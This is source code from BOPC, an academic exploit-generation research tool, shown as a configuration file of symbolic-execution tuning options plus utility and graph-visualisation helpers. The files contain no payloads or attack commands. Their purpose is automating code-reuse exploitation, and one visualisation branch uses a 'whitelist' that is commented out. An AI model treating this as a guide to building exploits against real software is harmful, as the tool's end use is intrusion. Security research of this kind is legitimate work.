    "path": "source/config.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# config.py\n#\n# This is the main configuration file with BOPC options.\n#\n# NOTE: There are a bunch of minor configuration options, on coreutils.py but there is no reason\n#       to modify them.\n#\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Depth metric for functions (can be 'min', 'max' or 'median')\n#  \n# Determine the metric for measuring function's depth. This option estimates the minimum number of\n# distinct basic blocks that should be executed within a function. To do that, one should look at\n# the shortest paths from the entry point to all final basic blocks (those that end with a return\n# instruction) and select as depththe length of the minimum of these (shortest) paths ('min' \n# option).\n#\n# However this metric might not always work that well, as it's very common to make argument checks\n# at the very early stages of a function and abort if they do not meet the requirements.\n#   \n# Hence, we provide 3 metrics: The minimum among the shortest paths that we discussed, the maximum\n# ('max' option) and the median of all shortest paths ('median' option).\n# \nFUNCTION_DEPTH_METRIC = 'min'\n\n\n\n# -------------------------------------------------------------------------------------------------\n# When the Symbolic Execution engine gives up on a basic block abstraction (in seconds)\n#\nABSBLK_TIMEOUT = 5\n\n\n\n# -------------------------------------------------------------------------------------------------\n# How many tries we should make before we give up on __enum_induced_subgraphs().\n#\n# Enumerating all induced subgraphs can take exponential time. To address that we set an upper\n# bound. After calculating a fixed number of induced subgraphs, we give up, and we use the \n# best ones up to that point. Set this value to -1 to set the upper bound to infinity.\n#\nMAX_INDUCED_SUBRAPHS_TRIES = -1\nMAX_ALLOWED_INDUCED_SUBGRAPHS = 1024\n\n\n\n# -------------------------------------------------------------------------------------------------\n# How many times we should permute the OOO SPL statements before we give up. Set to -1 to try all\n# possible permutations. This makes sense when 'ooo' optimization is enabled\n#\nN_OUT_OF_ORDER_ATTEMPTS = 3\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Trace searching algorithm picks the K shortest paths from Delta Graph (K = PARAMETER_K). However\n# there are cases that there are >K paths that are all worth to try. In those cases we keep trying\n# paths, as long as their distances are below this threshold.\n#\n# MAX_GOOD_INDUCED_SUBGRAPH_SIZE = 10 (NOT IMPLEMENTED)\n#\nPARAMETER_K = 4#10\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Number of different shortest paths between 2 functional blocks (needed for concolic execution).\n# Set to -1 to try all shortest paths\n#\nPARAMETER_P = 8\n\n\n\n# -------------------------------------------------------------------------------------------------\n# The actual size of load/store operations for memrd and memwr SPL statements in bytes. This\n# parameter can be 1, 2, 4 or 8 bytes.\n#\nMEMORY_LOADSTORE_SIZE = 1\n\n\n\n# -------------------------------------------------------------------------------------------------\n# When the Symbolic Execution engine gives up on trace searching (in seconds). That is, when\n# the concolic execution gives up on verifying a dispatcher gadget.\n#\nSE_TRACE_TIMEOUT = 8\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Maximum length of the final trace (a candidate execution trace cannot have more blocks that this).\n#\nMAX_ALLOWED_TRACE_SIZE = 100\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Maximum number of basic blocks in path between 2 accepted blocks (i.e., maximum number of basic\n# blocks in a dispatcher).\n#\nMAX_ALLOWED_SUBPATH_LEN = 40\n\n\n\n# -------------------------------------------------------------------------------------------------\n# The stack base address (along with $rsp) for symbolic execution.\n#\n# WARNING: Make sure that RSP doesn't go beyond page limit (o/w addresses are not +w) +0x800 is a\n#          very good offset. Don't change it !\n# \nSTACK_BASE_ADDR = 0x7ffffffffff0000\nRSP_BASE_ADDR   = STACK_BASE_ADDR + 0x800\n\n\n\n# -------------------------------------------------------------------------------------------------\n# In some cases it may be worth to make $rbp symbolic as well (depends on the binary).\n#\nMAKE_RBP_SYMBOLIC = False\n\n\n\n# -------------------------------------------------------------------------------------------------\n# What if the final solution requires some registers to be initialized upon entry point? In that\n# case we can either shift the entry point backwards, at the point that register is initiliazed,\n# and re-run BOPC from there, or we can simply such solutions.\n#\nALLOW_REGISTER_WRITES = True\n\n\n\n# -------------------------------------------------------------------------------------------------\n# I have no idea what this is for, but it seems that I was planning to make another optimization.\n#\nMAXIMUM_THRESHOLD = 0x800\n\n\n\n# -------------------------------------------------------------------------------------------------\n# When we deal with loops, the Symbolic Execution engine should simulate the loop the same number\n# of times (to ensure that the all iterations can be exetuted successfully under exploitation).\n# However, when we have infinity loops, we cannot simulate the loop and infinite amount of times,\n# but instead we have to stop at a certain threshold.\n#\n# WARNING: Make sure that in case of conditional loops, the number of expected iterations is\n#          larger than this value, otherwise we will get no solution\n#\nSIMULATED_LOOP_ITERATIONS = 4 #128\n\n\n\n# -------------------------------------------------------------------------------------------------\n# Another optimization that never implemented...\n#\nADAPTIVE_LOOP_SIMULATION = True\n\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/coreutils.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# coreutils.py:\n#\n# This module contains basic declarations and functions that are being used by all other modules.\n#\n# -------------------------------------------------------------------------------------------------\nfrom config import *                                # load configuration options\n\nfrom graphviz import Digraph\nimport networkx as nx\nimport datetime\nimport random\nimport re\nimport angr\nimport textwrap\n\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                    CONSTANT DECLARATIONS                                    '''\n''' =========================================================================================== '''\n\n# -------------------------------------------------------------------------------------------------\nRETURN_SUCCESS     = 0                              # return code for success\nRETURN_FAILURE     = -1                             # return code for failure\n\nDBG_LVL_0          = 0                              # debug level 0: Display no information\nDBG_LVL_1          = 1                              # debug level 1: Display minimum information\nDBG_LVL_2          = 2                              # debug level 2: Display basic information\nDBG_LVL_3          = 3                              # debug level 3: Display detailed information\nDBG_LVL_4          = 4                              # debug level 3: Display all information\n\nINFINITY           = 9999999                        # value of infinity\n\nSTART_PC           = 0                              # PC of the for the 1st statement\n\nADDR2NODE          = { }                            # map addresses to basic block nodes\nADDR2FUNC          = { }                            # map basic block addresses to their functions\nSTR2BV             = { }                            # map strings to bitvectors\n\n\n# WARNING: be very careful how to set rbp\nFRAMEPTR_BASE_ADDR = RSP_BASE_ADDR + 0xc00          # base address of rbp (when it's used)\n\nHARDWARE_REGISTERS = [                              # x64 hardware registers\n    'rax', 'rdx', 'rcx', 'rbx', 'rdi', 'rsi', 'rsp', 'rbp',\n    'r8',  'r9',  'r10', 'r11', 'r12', 'r13', 'r14', 'r15' \n]\n\nSYM2ADDR = { }\n\nSYMBOLIC_FILENAME = 'foo.txt'                       # filename for the symbolic execution to use\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                     AUXILIARY FUNCTIONS                                     '''\n''' =========================================================================================== '''\n\n# -------------------------------------------------------------------------------------------------\ndbg_lvl = DBG_LVL_0                                 # initially, debug level is set to 0\n\n\n# -------------------------------------------------------------------------------------------------\n# set_dbg_lvl(): Set the current debug level. This is a small trick to share a variable between\n#   modules. We set the debug level once during startup, so we don't have to carry it around the\n#   modules.\n# \n# :Arg lvl: Desired debug lebel.\n# :Ret: None.\n#\ndef set_dbg_lvl( lvl ):\n    global dbg_lvl                                  # use the global var     \n    if lvl: dbg_lvl = lvl                           # set it accordingly (if lvl is proper)\n\n\n\n# ---------------------------------------------------------------------------------------------\n# to_uid(): Cast program counter (PC) to unique ID (UID).\n#\n# :Arg pc: The program counter\n# :Ret: The uid.\n#\ndef to_uid( pc ):\n    if not re.match(r'^@__[0-9]+$', pc):            # verify pc\n        raise Exception(\"Invalid Program counter '%s'.\" % pc)\n\n    return int(pc[3:])                              # simply drop the first 3 characters\n\n\n\n# ---------------------------------------------------------------------------------------------\n# pretty_list(): Cast a list into a pretty string, for displaying to the user. This can be\n#       also done using join(), but code starts getting ugly when we have to cast each element.\n#\n# :Arg uglylist: The list to work on\n# :Ret: A string containing a pretty \"join\" of the list.\n#\ndef pretty_list( uglylist, delimiter=' - '):\n    pretty = ''                                     # the final string\n\n    for elt in uglylist:\n        if isinstance(elt, int) or isinstance(elt, long):\n            pretty += delimiter + '%x' % elt\n\n        elif isinstance(elt, str):\n            pretty += delimiter + elt\n\n        elif isinstance(elt, angr.analyses.cfg.cfg_node.CFGNode):\n            pretty += delimiter + '%x' % elt.addr\n\n        else:\n            fatal(\"Unsupported list element type'%s'\" % str(type(elt)))\n\n\n    # drop the first delimiter (if exists) and return string\n    return pretty[len(delimiter):] if pretty else ''\n\n\n\n# -------------------------------------------------------------------------------------------------\n# to_edges(): Convert a path to edges. That is, given the path P = ['A', 'B', 'C', 'D', 'E'],\n#       return its edges: [('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'E')]. Function is a \n#       generator, so it returns one edge at a time.\n#\n#       Note that function can be implemented with a single line: \"return zip(path, path[1:])\".\n#       However, the problem with zip() is that it creates 2 more copies of the list, which is\n#       not very efficient, when paths are long and all we want is to iterate over the edges.\n#\n# :Arg path: A list that contains a path\n# :Arg direction: Edge direction (forward/backward)\n# :Ret: Function is a generator. Each time the next edge from the path is returned.\n#\ndef to_edges( path, direction='forward' ):\n    if len(path) < 2: return                        # nothing to do\n\n    u = path[0]                                     # get the 1st node\n    for v in path[1:]:\n        if   direction == 'forward':  yield (u, v)  # return the previous and the current node\n        elif direction == 'backward': yield (v, u)  # or return the backward edge\n\n        u = v                                       # update previous node\n\n\n\n# -------------------------------------------------------------------------------------------------\n# mk_reverse_adj(): Given an Adjacency List, make the Reverse Adjacency List.\n#\n# :Arg adj: The Adjacency List\n# :Ret: Function returns a dictionary which encodes the Reverse Adjacency List.\n#\ndef mk_reverse_adj( adj ):        \n        radj = { }\n\n        for a, b in adj.iteritems():\n            for c in b:\n                radj.setdefault(c, []).append(a)\n\n        return radj\n\n\n\n# -------------------------------------------------------------------------------------------------\n# disjoint(): Check whether two sets are disjoint or not.\n#\n# :Arg set_a: The first set\n# :Arg set_b: The second set\n# :Ret: If sets are disjoint, function returns True. Otherwise it returns False.\n#\ndef disjoint( set_a, set_b ):\n    for a in set_a:\n        for b in set_b:\n            if a == b: \n                return False\n\n    return True\n\n\n\n# -------------------------------------------------------------------------------------------------\n# log(): Log execution statistics to a file.\n#\n# :Arg msg: Message to log\n# :Ret: None.\n#\ndef log( msg ):\n    pass                                            # not used.\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                     PRINTING FUNCTIONS                                      '''\n''' =========================================================================================== '''\n\n# -------------------------------------------------------------------------------------------------\n# now(): Get current time. Time is prepended to every print statement.\n#\n# :Ret: A string containing the current time.\n#\ndef now():\n    return '[%s]' % datetime.datetime.now().strftime(\"%H:%M:%S,%f\")[:-3]\n\n\n\n# -------------------------------------------------------------------------------------------------\n# dbg_prnt(): Display a debug message to the user.\n#\n# :Arg lvl: Message's debug level\n# :Arg msg: Message to print\n# :Arg pre: Message prefix (OPTIONAL)\n# :Ret: None.\n#\ndef dbg_prnt( lvl, msg, pre='[+] ' ):\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print now(), pre + msg\n\n\n\n# -------------------------------------------------------------------------------------------------\n# dbg_arb(): Display a debug message followed by an arbitrary data structure to the user.\n#\n# :Arg lvl: Message's debug level\n# :Arg msg: Message to print\n# :Arg arb: The arbitrary data struct (e.g., list, dict) to print\n# :Arg pre: Message prefix (OPTIONAL)\n# :Ret: None.\n#\ndef dbg_arb( lvl, msg, arb, pre='[+] ' ):\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print now(), pre + msg, arb\n    \n\n\n# -------------------------------------------------------------------------------------------------\n# func_name(): Convert an address to the name of its function, or\n# \"__unknown\" if it cannot be found.\n#\n# :Arg addr: The address to lookup\n# :Ret: Returns a string with the name of the function containing the address, or \"__unknown\".\n#\ndef func_name ( addr ):\n    if addr in ADDR2FUNC:\n        return ADDR2FUNC[addr].name\n    else:\n        return \"__unknown\"\n\n\n\n# -------------------------------------------------------------------------------------------------\n# fatal(): This function is invoked when a fatal error occurs. It prints the error and terminates\n#       the program.\n#\n# :Arg err: Error message to print\n# :Ret: None.\n#\ndef fatal( err ):\n    print '\\033[91m%s [FATAL]' % now(), err + '.\\033[0m'\n    exit( RETURN_FAILURE )\n\n\n\n# -------------------------------------------------------------------------------------------------\n# error(): This function is invoked when a non-fatal error occurs. It prints the error without\n#       terminating the program.\n#\n# :Arg err: Error message to print\n# :Ret: None.\n#\ndef error( err ):\n    print '\\033[91m%s [ERROR]' % now(), err + '.\\033[0m'\n    \n\n\n# -------------------------------------------------------------------------------------------------\n# warn(): Print a warning.\n#\n# :Arg warning: Warning to print\n# :Ret: None.\n#\ndef warn( warn, lvl=DBG_LVL_0 ):\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print  '\\033[93m%s [WARNING]' % now(),  warn + '.\\033[0m'\n    \n\n\n# -------------------------------------------------------------------------------------------------\n# warn(): Print an emphasized message.\n#\n# :Arg msg: Message to pring\n# :Arg lvl: Message's debug level\n# :Arg pre: Message prefix (OPTIONAL)# :Ret: None.\n# :Ret: None.\n#\ndef emph( msg, lvl=DBG_LVL_0 , pre='[*] '):\n    # default mode is to print always\n    if dbg_lvl >= lvl:                              # print only if you're in the right level\n        print  '\\033[0;32m%s' % now(), pre + msg + '\\033[0m'\n\n\n\n# -------------------------------------------------------------------------------------------------\n# bold(): Emphasize a number (bold).\n#\n# :Arg num: Number to make bold\n# :Arg ty: The type of the number (int / float)\n# :Arg pad: Zero padding size (OPTIONAL)\n# :Ret: The emphasized number.\n#\ndef bold( num, ty='int', pad=None ):\n    fms = 'd' if ty == 'int' else '.2f'           # select the format string (int / float)\n\n    if not pad:\n        return (\"\\033[1m%\" + fms + \"\\033[21m\") % num\n    else:\n        # this is a double format string (recursive)        \n        return (\"\\033[1m\" + ((\"%%%d\" + fms) % pad) + \"\\033[21m\") % num \n\n\n\n# -------------------------------------------------------------------------------------------------\n# bolds(): Emphasize a string (bold).\n#\n# :Arg string: Message to make bold\n# :Ret: The emphasized string.\n#\ndef bolds( string ):\n    return \"\\033[1m%s\\033[21m\" % string             # print in bold (and unbold)\n\n\n\n# -------------------------------------------------------------------------------------------------\n# rainbow(): Print a string with rainbow colors.\n#\n# :Arg string: Message to make rainbow.\n# :Ret: None.\n#\ndef rainbow( string ):\n    RED     = lambda key : \"\\033[91m%c\\033[0m\" % key\n    GREEN   = lambda key : \"\\033[92m%c\\033[0m\" % key\n    YELLOW  = lambda key : \"\\033[93m%c\\033[0m\" % key\n    MAGENTA = lambda key : \"\\033[95m%c\\033[0m\" % key\n    CYAN    = lambda key : \"\\033[96m%c\\033[0m\" % key\n   \n    return ''.join([{ 0 : RED, \n                      1 : CYAN, \n                      2 : YELLOW, \n                      3 : MAGENTA, \n                      4 : GREEN \n                    }[ ctr % 5 ](ch) for ctr, ch in enumerate(string)])\n\n\n\n# -------------------------------------------------------------------------------------------------\n\n''' =========================================================================================== '''\n'''                                GRAPH VISUALIZATION FUNCTIONS                                '''\n''' =========================================================================================== '''\n\n# -------------------------------------------------------------------------------------------------\n# Visualizing Options (VO)\n# -------------------------------------------------------------------------------------------------\nVO_NONE            = 0x0000                         # no visualization\nVO_TYPE_CFG        = 'cfg'                          # visualizion mode: CFG\nVO_TYPE_DELTA      = 'delta'                        # visualizion mode: delta graph\nVO_TYPE_CAPABILITY = 'cap'                          # visualizion mode: capability graph\nVO_CFG             = 0x0080                         # visualize CFG\nVO_CAND            = 0x0040                         # visualize candidate blocks\nVO_ACC             = 0x0010                         # visualize accepted blocks\nVO_CLOB            = 0x0020                         # visualize clobbering blocks\nVO_PATHS           = 0x1000                         # draw execution paths (i.e., dispathcers)\nVO_DRAW_INF_EDGES  = 0x2000                         # draw edges with infinite weight\n\n\n\n# -------------------------------------------------------------------------------------------------\n# _node_colors(): Color a node properly.\n#\n# :Arg graph: The name of the generated file.\n# :Ret: If the graph is visualized successfully function returns True. Otherwise it returns\n#       False.\n#\nclass _node_colors( object ):\n\n    # ---------------------------------------------------------------------------------------------\n    #\n    #\n    #\n    def __init__( self ):\n        self.__colormap = dict()\n\n    # ---------------------------------------------------------------------------------------------\n    # \n    #\n    #\n    def __setitem__( self, color, nodeset ):\n        for node in nodeset:\n            self.__colormap[ node ] = color\n\n    # ---------------------------------------------------------------------------------------------\n    # \n    #\n    #\n    def __iter__( self ):\n        for node, color in self.__colormap.iteritems():\n            yield (node, color)\n\n    # ---------------------------------------------------------------------------------------------\n    # \n    #\n    #\n    def __contains__( self, node ):\n        return node in self.__colormap\n\n    # ---------------------------------------------------------------------------------------------\n    # \n    #\n    #\n    def get_nodes( self ):\n        return self.__colormap.keys()\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n\n# -------------------------------------------------------------------------------------------------\n# __get_dg_layers(): Get delta graph layers.\n# \n# :Arg delta_graph: The delta graph\n# :Ret: the list of the layers.\n#\ndef __get_dg_layers( delta_graph ):\n    return sorted( list(set([uid for uid,_ in delta_graph.nodes()])) )\n    \n\n \n# -------------------------------------------------------------------------------------------------\n# __get_dg_layer_nodes(): Get the nodes from a delta graph layer.\n#\n# :Arg delta_graph: The delta graph\n# :Arg layer_id: Layer to return\n# :Ret: the list of nodes for the specified layer.\n#\ndef __get_dg_layer_nodes( delta_graph, layer_id ):\n    return sorted([addr for uid, addr in delta_graph.nodes() if uid == layer_id])\n      \n\n\n# -------------------------------------------------------------------------------------------------\n# visualize(): Visualize a graph and save it into a (pdf) file. This function supports a\n#       number of options to customise the visualization.\n#\n# :Arg filename: The name of the generated file.\n# :Arg entry: The entry point that trace searching algorithm starts\n# :Arg options: An integer that describes how the CFG should be visualized. It can be the \n#       logical OR of one or more of the following:\n#\n#       VO_NONE            | Do not do anything (Default)\n#       VO_DRAW_CFG        | Draw the CFG\n#       VO_DRAW_CANDIDATE  | Draw all candidate blocks\n#       VO_DRAW_ACCEPTED   | Draw all accepted blocks\n#       VO_DRAW_CLOBBERING | Draw all clobbering blocks\n#       VO_DRAW_SE_PATHS   | Draw the symbolic execution paths (if any)\n#       VO_SHOW_LABELS     | Show labels for blocks (their address in hex)\n#       VO_HIDE_EDGES      | Do not draw any edges\n#       VO_NO_FAKERET      | Do not draw the \"fakeret\" edges\n#\n# :Arg paths: If VO_DRAW_SE_PATHS is set, this argument is a list of the paths to draw\n# :Ret: If the CFG is visualized successfully function returns True. Otherwise it returns\n#       False.\n#\ndef visualize( graph, gtype='', options=VO_NONE, entry=-1, filename=None, paths=set(), cur_uid=0, \n               func=None ):\n                   \n    G = Digraph('G', format='svg', filename=filename)\n\n    nodes      = _node_colors()\n    nodeset    = set()\n    path_edges = { }\n    path_nodes = set()\n\n    '''\n    if options & VO_DRAW_SE_PATHS:              # show \n        edges = []\n\n        # convert paths (a, b, c, d) to edge sets ((a,b), (b,c), (c,d))\n        for path in paths:\n            u = path[0]\n            \n            for v in path[1:]:\n                edges.append( (u, v) )\n                u = v\n\n\n        # draw all edges \n        nx.draw_networkx_edges(G, pos, edgelist=edges,\n             edge_color='red', style='solid', arrows=False, width=1, alpha=1)\n    '''\n\n    if options & VO_PATHS:\n        #   for path in paths:\n        #       for u in path:\n        #           path_nodes.add(u)\n        #\n        #   for u, v in zip(path, path[1:]):\n        #        path_edges[ (u, v) ] = 1\n\n        path_edges = paths\n\n\n    # ---------------------------------------------------------------------\n    # Control Flow Graph\n    # ---------------------------------------------------------------------\n    if gtype == VO_TYPE_CFG:\n        # -------------------------------------------------------------------------------\n        # First identify the set of nodes (along with the color) to visualize\n        # -------------------------------------------------------------------------------\n\n        # -------------------------------------------------------------------------------\n        if options & VO_CFG:\n            for node in graph.nodes():\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, fillcolor='white', shape='box', style='filled')\n                nodeset.add(node.addr)\n\n        # -------------------------------------------------------------------------------\n        if options & VO_CAND:\n            # nodes['yellow' ] = get_nodes('cand')\n            # (<CFGNode frame_dummy+0x1f 0x40078fL[6]>, [(14, [...]), (16, [...])]),\n\n            for node, attr in nx.get_node_attributes(graph, 'cand').iteritems():\n\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, label='%x' % node.addr,\n                        # label='%x\\n%s' % (node.addr, ', '.join(['%d' % uid[0] for uid in attr])),\n                        fillcolor='yellow', shape='box', style='filled')\n\n                nodeset.add(node.addr)\n\n        # -------------------------------------------------------------------------------\n        if options & VO_ACC:\n            # nodes['lawngreen'] = ['0x%x\\n%s' % (n.addr, ', '.join([str(x) for x in s]))\n            #                           for n, s in get_attr('acc')]\n            #\n            # (<CFGNode main+0x141 0x4009c6L[17]>, [14])\n            # print [(n,s) for n, s in get_attr('acc')]\n           \n            for node, attr in nx.get_node_attributes(graph, 'acc').iteritems():\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, label='%x' % node.addr,\n                        # label='%x\\n%s' % (node.addr, ', '.join(['%d' % uid for uid in attr])),                            \n                        # fillcolor='lawngreen',\n                        shape='doubleoctagon', style='filled, bold')\n\n                nodeset.add(node.addr)\n\n        # -------------------------------------------------------------------------------\n        if options & VO_CLOB:        \n            # nodes['orangered'] = ['0x%x\\n%s' % (n.addr, ', '.join([str(x) for x in s])) \n            #                           for n, s in get_attr('clob')]\n            #\n            # (<CFGNode _init 0x4005d0[16]>, set([16, 14])),\n            # print [(n,s) for n, s in get_attr('clob')]\n\n            for node, attr in nx.get_node_attributes(graph, 'clob').iteritems():\n\n                if func and node.addr not in func.block_addrs:\n                    continue\n\n                G.node('%x' % node.addr, label='%x' % node.addr,\n                        # label='0x%x\\n%s' % (node.addr, ', '.join(['%d' % uid for uid in attr])),                            \n                        fillcolor='orangered', shape='box', style='filled')\n\n                nodeset.add(node.addr)\n\n\n        # -------------------------------------------------------------------------------\n        # Entry point\n        # -------------------------------------------------------------------------------\n        if entry != -1:\n            G.node('%x' % entry, shape='box')  #, style='filled', fillcolor='gray')                \n            \n\n\n        # -------------------------------------------------------------------------------\n        # Then, draw the edges\n        # -------------------------------------------------------------------------------\n\n        # subgraph = graph.subgraph( nodes.get_nodes() )    \n        # print graph.nodes()\n\n        for u, v in graph.edges_iter():\n            #   if u.addr in nodes and v.addr in nodes:\n            #       G.edge('0x%x' % u.addr, '0x%x' % v.addr)\n\n            if u.addr in nodeset and v.addr in nodeset:\n                if (u.addr, v.addr) in path_edges:\n                    pass\n                    # G.edge('0x%x' % u.addr, '0x%x' % v.addr, #label='%d' % path_edges[u.addr, v.addr],\n                    #        color='deepskyblue', style='setlinewidth(3)', font='Arial Black', \n                    #        fontsize='30'#, fontcolor='purple'\n                    # )\n                else:\n                    G.edge('%x' % u.addr, '%x' % v.addr)\n\n\n        for (u, v) in path_edges:\n            path_nodes.add( u )\n            path_nodes.add( v )\n\n        for (u, v) in path_edges:\n            G.edge('%x' % u, '%x' % v, # label='%d' % path_edges[u.addr, v.addr],\n                    color='blue', style='setlinewidth(5)', font='Arial Black', \n                    fontsize='30', fontcolor='purple'\n            )\n  \n        '''\n        G.node('foo', label='', shape='doubleoctagon', fillcolor='white', style='filled, bold')\n        G.node('bar', label='      ', shape='ellipse')\n        G.node('baz', label='', shape='box')\n\n        G.node('A', label='', color='white', fillcolor='white')\n        G.node('B', label='', color='white', fillcolor='white')\n\n        G.edge('A', 'B', color='blue', style='setlinewidth(5)')\n        '''\n\n\n    # -----------------------------------------------------------------------------------\n    # Delta Graph\n    # -----------------------------------------------------------------------------------\n    elif gtype == VO_TYPE_DELTA:\n        # add invisible edges between layers to align them\n        for layer_from, layer_to in to_edges(__get_dg_layers(graph)):\n            nodes_1 = __get_dg_layer_nodes(graph, layer_from)\n            nodes_2 = __get_dg_layer_nodes(graph, layer_to)            \n\n            # skip some nodes from the first layer (too many)\n            # whitelist = [0x41dfe3, 0x41e02a, 0x407a1c, 0x403d4b, 0x403d6c, 0x407887, 0x404D5A]\n\n            if layer_from == 2:\n                nodes_1 = [n for n in nodes_1 if n in whitelist]\n           \n            if layer_to == 2:\n                nodes_2 = [n for n in nodes_2 if n in whitelist]\n \n            for n in nodes_1:\n                for m in nodes_2:                      \n                    G.edge('%d-%x' % (layer_from, n), '%d-%x' % (layer_to, m), color='transparent')\n\n\n        # test edges\n        #\n        # G.edge('6-403e4e', '16--1', color='transparent')\n        # G.edge('6-403fd9', '16--1', color='transparent')\n        #\n        # G.node('6-999999', color='transparent', fontcolor='transparent')\n\n        for node in graph.nodes():\n            print node, graph.in_degree(node), graph.out_degree(node)\n            uid, addr = node\n\n            # skip some nodes from the first layer (too many)\n            if uid == 2 and addr not in whitelist:\n                print '\\tDROP!'\n                continue\n\n            with G.subgraph(name='cluster_%d' % uid) as c:\n                \n                c.node_attr.update(style='filled', color='white')\n\n                # c.edges([('a0', 'a1'), ('a1', 'a2'), ('a2', 'a3')])\n                # c.attr(label='UID: %d' % uid, labelloc='t' if uid == 0 else 'b' )\n                c.attr(label='Statement #%d' % uid, style='setlinewidth(3)', color='gray35',\n                        labeljust='l', labelloc='t', fontcolor='gray35')\n\n                ''' \n                good = 0\n\n                for n in graph.in_edges(node):\n                    if graph[n[0]][node]['weight'] != INFINITY:\n                        good += 1\n                \n                for n in graph.out_edges(node):\n                    if graph[node][n[1]]['weight'] != INFINITY:\n                        good += 1\n\n                if good:\n                    c.node('%d-%x' % (uid, addr), label='0x%x' % addr)\n                '''\n               \n                c.node('%d-%x' % (uid, addr), font='Arial Black', \n                        label=('%x' % addr) if addr > 0 else '    -1    ')\n\n\n                # G.node('%d-%x' % (uid, addr), fillcolor='white', shape='box', style='filled')                \n                \n\n        dbg_arb(DBG_LVL_2, \"Path Edges:\", path_edges)\n\n        for u, v, w  in graph.edges(data=True):\n            print 'Edge', u, ' -> ', v\n            \n            if (u, v) in path_edges:\n                G.edge('%d-%x' % u, '%d-%x' % v, label=('%d' % w['weight']) if v[0] != 16 else '0',\n                        color='blue', style='setlinewidth(3)', font='Arial Black', \n                        fontsize='14', fontcolor='blue', constraint='false' \n                )\n\n                G.node('%d-%x' % u, color='blue', fontcolor='blue', style='setlinewidth(3)')\n                G.node('%d-%x' % v, color='blue', fontcolor='blue', style='setlinewidth(3)')\n\n            else:\n                if u[0] == 2 and u[1] not in whitelist:\n                    continue\n\n                if v[0] == 2 and v[1] not in whitelist:\n                    continue\n\n                if v[0] == 16:\n                    G.edge('%d-%x' % u, '%d-%x' % v, fontsize='14', label='0', constraint='false' )    \n                \n                elif w['weight'] != INFINITY:\n                    G.edge('%d-%x' % u, '%d-%x' % v, fontsize='14', label='%d' % w['weight'], \n                            constraint='false' )    \n\n                elif options & VO_DRAW_INF_EDGES:\n                    G.edge('%d-%x' % u, '%d-%x' % v, label='INF', constraint='false' )    \n        pass\n\n\n\n    # -------------------------------------------------------------------------\n    # Capability Graph\n    # ------------------------------------------------------------------------- \n    elif gtype == VO_TYPE_CAPABILITY:\n        # TODO: 1. Elaborate on call, etc.\n        #       2. No edge with weigth=0 on stmt on the same addr\n\n        get_attr  = lambda attr  : nx.get_node_attributes(graph, attr).iteritems()\n        get_nodes = lambda blkty : set([n.addr for n, _ in get_attr(blkty)])\n        get_stmt  = lambda stmt  : set([n for n, s in get_attr('type') if s == stmt])\n\n\n        for node, attr in graph.nodes(data=True):            \n            color = {\n                'regset' : 'whitesmoke',\n                'regmod' : 'limegreen',\n                'call'   : 'turquoise2',\n                'cond'   : 'maroon1'\n            }[ attr['type'] ]\n\n            G.node('%d' % node, label='0x%x\\n%d - %s' % (attr['addr'], node, attr['type']),\n                fillcolor=color, shape='box', style='filled')\n     \n        for u, v, w in graph.edges_iter(data=True):\n            G.edge('%d' % u, '%d' % v, label='%d' % w['weight'])\n   \n\n    # 